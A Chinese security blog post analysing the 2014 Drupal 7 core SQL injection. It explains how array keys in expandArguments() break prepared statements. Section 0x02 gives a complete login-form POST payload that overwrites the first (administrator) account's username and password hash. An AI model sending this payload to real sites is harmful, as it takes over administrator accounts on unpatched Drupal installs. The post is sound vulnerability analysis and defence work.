Drupal 7.x系列核心代码SQL注入漏洞分析 Secer's Blog - 记录互联网安全历程与个人成长经历

文章目录

0x00 漏洞概述

2014年10月15日，德国安全研究者Stefan Horst（SE大神）发布重磅消息，全球三大CMS之一的Drupal核心代码出现SQL注入漏洞。

本着朝圣的心态，我去深入的分析了这个漏洞的成因以及利用。个人感觉这个漏洞可以说是打开了SQL注入的一扇新的大门，因为它直接呈现出预编译方法，并非SQL注入的绝对防御。

而在利用方面，我找到了一种利用这个SQL注入轻松RCE的方法，只需要两个HTTP请求哦！

0x01 漏洞根源

这个漏洞出现问题的地方在includes\database\database.inc文件中，代码如下所示：

protected function expandArguments(&$query, &$args) {
    $modified = FALSE;

    // If the placeholder value to insert is an array, assume that we need
    // to expand it out into a comma-delimited set of placeholders.
    foreach (array_filter($args, 'is_array') as $key =&gt; $data) {
      $new_keys = array();
      foreach ($data as $i =&gt; $value) {
        // This assumes that there are no other placeholders that use the same
        // name.  For example, if the array placeholder is defined as :example
        // and there is already an :example_2 placeholder, this will generate
        // a duplicate key.  We do not account for that as the calling code
        // is already broken if that happens.
        $new_keys[$key . '_' . $i] = $value;
      }

      // Update the query with the new placeholders.
      // preg_replace is necessary to ensure the replacement does not affect
      // placeholders that start with the same exact text. For example, if the
      // query contains the placeholders :foo and :foobar, and :foo has an
      // array of values, using str_replace would affect both placeholders,
      // but using the following preg_replace would only affect :foo because
      // it is followed by a non-word character.
      $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

      // Update the args array with the new placeholders.
      unset($args[$key]);
      $args += $new_keys;

      $modified = TRUE;
    }

    return $modified;
  }

protected function expandArguments(&$query, &$args) {

$modified = FALSE;

// If the placeholder value to insert is an array, assume that we need

// to expand it out into a comma-delimited set of placeholders.

foreach (array_filter($args, 'is_array') as $key => $data) {

$new_keys = array();

foreach ($data as $i => $value) {

// This assumes that there are no other placeholders that use the same

// name. For example, if the array placeholder is defined as :example

// and there is already an :example_2 placeholder, this will generate

// a duplicate key. We do not account for that as the calling code

// is already broken if that happens.

$new_keys[$key . '_' . $i] = $value;

}

// Update the query with the new placeholders.

// preg_replace is necessary to ensure the replacement does not affect

// placeholders that start with the same exact text. For example, if the

// query contains the placeholders :foo and :foobar, and :foo has an

// array of values, using str_replace would affect both placeholders,

// but using the following preg_replace would only affect :foo because

// it is followed by a non-word character.

$query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

// Update the args array with the new placeholders.

unset($args[$key]);

$args += $new_keys;

$modified = TRUE;

}

return $modified;

}

这段代码是用来对传入数据库中的多个参数值进行预处理用的，因为Drupal对于SQL是会进行预编译处理的（传说中有效防止SQL注入的手段）。但是由于考虑不严，导致攻击者可以通过构造数组，操控数组中的索引key，在预编译之前破坏原有的SQL结构，造成SQL注入攻击。

简单解释下这个过程：

这个函数会对存在多个值的参数进行处理，来应对SQL中IN这样的语句。就像下面这样的SQL，如果name的值是多个，就需要对传入的参数进行进一步处理。

SELECT * FROM {users} where name IN (:name)

1	SELECT * FROM {users} where name IN (:name)

这个函数传入的args参数大概是这样的：

array(':name'=&gt;array('user1','user2')));

1	array(':name'=>array('user1','user2')));

函数首先会检测数组中的值是否也是数组，如果不是则跳过。将符合条件的数组key存入$key中，然后遍历value中的数组，将其中的值存入$new_key数组中，数组索引为$key+value数组中各个值的数字索引。

$new_keys[$key . '_' . $i] = $value;

1	$new_keys[$key . '_' . $i] = $value;

这里引入了字符串拼接，将SQL注入的风险带入。原本它期待的数据是我们上面给出的那样，但是试想，如果value数组的索引key我们用字符串，而不是数字呢？就像这样：

array(':name'=&gt;array('test -- ' =&gt; 'user1','test' =&gt; 'user2')));

1	array(':name'=>array('test -- ' => 'user1','test' => 'user2')));

那$new_keys的索引就会变成“name_test — ”了，带着这个问题我们接着看最关键的地方：

$query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

1	$query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

用刚刚生成的$new_key数组索引key引入到了预编译SQL语句中，这样的话SQL语句就会变成这样：

SELECT * FROM users WHERE name = :name_test -- , :name_test

1	SELECT * FROM users WHERE name = :name_test -- , :name_test

在预编译前就引入了SQL注入问题！

0x02 漏洞利用

在pastebin上有人给出了一个利用Poc，利用登陆时的SQL语句进行注入，部分代码如下所示：

$password = trim($form_state['values']['pass']);
  if (!empty($form_state['values']['name']) && !empty($password)) {
    // Do not allow any login from the current user's IP if the limit has been
    // reached. Default is 50 failed attempts allowed in one hour. This is
    // independent of the per-user limit to catch attempts from one IP to log
    // in to many different user accounts.  We have a reasonably high limit
    // since there may be only one apparent IP for all users at an institution.
    if (!flood_is_allowed('failed_login_attempt_ip', variable_get('user_failed_login_ip_limit', 50), variable_get('user_failed_login_ip_window', 3600))) {
      $form_state['flood_control_triggered'] = 'ip';
      return;
    }
    $account = db_query("SELECT * FROM {users} WHERE name = :name AND status = 1", array(':name' =&gt; $form_state['values']['name']))-&gt;fetchObject();
    if ($account) {

$password = trim($form_state['values']['pass']);

if (!empty($form_state['values']['name']) && !empty($password)) {

// Do not allow any login from the current user's IP if the limit has been

// reached. Default is 50 failed attempts allowed in one hour. This is

// independent of the per-user limit to catch attempts from one IP to log

// in to many different user accounts. We have a reasonably high limit

// since there may be only one apparent IP for all users at an institution.

if (!flood_is_allowed('failed_login_attempt_ip', variable_get('user_failed_login_ip_limit', 50), variable_get('user_failed_login_ip_window', 3600))) {

$form_state['flood_control_triggered'] = 'ip';

return;

}

$account = db_query("SELECT * FROM {users} WHERE name = :name AND status = 1", array(':name' => $form_state['values']['name']))->fetchObject();

if ($account) {

而且由于Drupal使用的是PDO方式操作数据库，可以直接多语句查询，我们可以直接update或者inster一个管理员。

具体操作为，向登陆URL：?q=node&destination=node提交如下POST内容：

name[0 ;update+users+set+name='admin'+,+pass+=+'$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s'+where+uid+%3d+'1';;#  ]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in

1	name[0 ;update+users+set+name='admin'+,+pass+=+'$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s'+where+uid+%3d+'1';;# ]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in

这样就可以将admin用户提升为管理员，并且密码设为P@55w0rd。

0x03 漏洞总结

这个漏洞简单直接的切入了对于使用预编译SQL语句方式防止SQL注入的软肋，即在预编译之前注入攻击语句。SE大神就是大神，这个漏洞完全对于SQL注入打开了一扇新的大门。

在利用方面Drupal悲催的使用PDO方式操作数据库，导致攻击者利用这个漏洞可以直接多语句操作数据库。自身超强的加密算法形同虚设，也为攻击者实现代码执行提供了多种便利。

漏洞小结

影响范围个人评价为“高”，全球知名的三大CMS之一，这影响力不用多说了。
危害性个人评价为“高”，此漏洞无需任何条件，便可实现远程代码执行。

防护方案

官方的修补方案还是很简单有效的，让该整型的整形，就这么简单:)。

Drupal最新版本为7.32，下载地址为：

https://www.drupal.org/download

0x04 参考文章

【1】《Advisory 01/2014: Drupal – pre Auth SQL Injection Vulnerability》

【2】《Drupal 7.31 pre Auth SQL Injection Vulnerability》

【3】《Drupal 7.x SQL Injection SA-CORE-2014-005》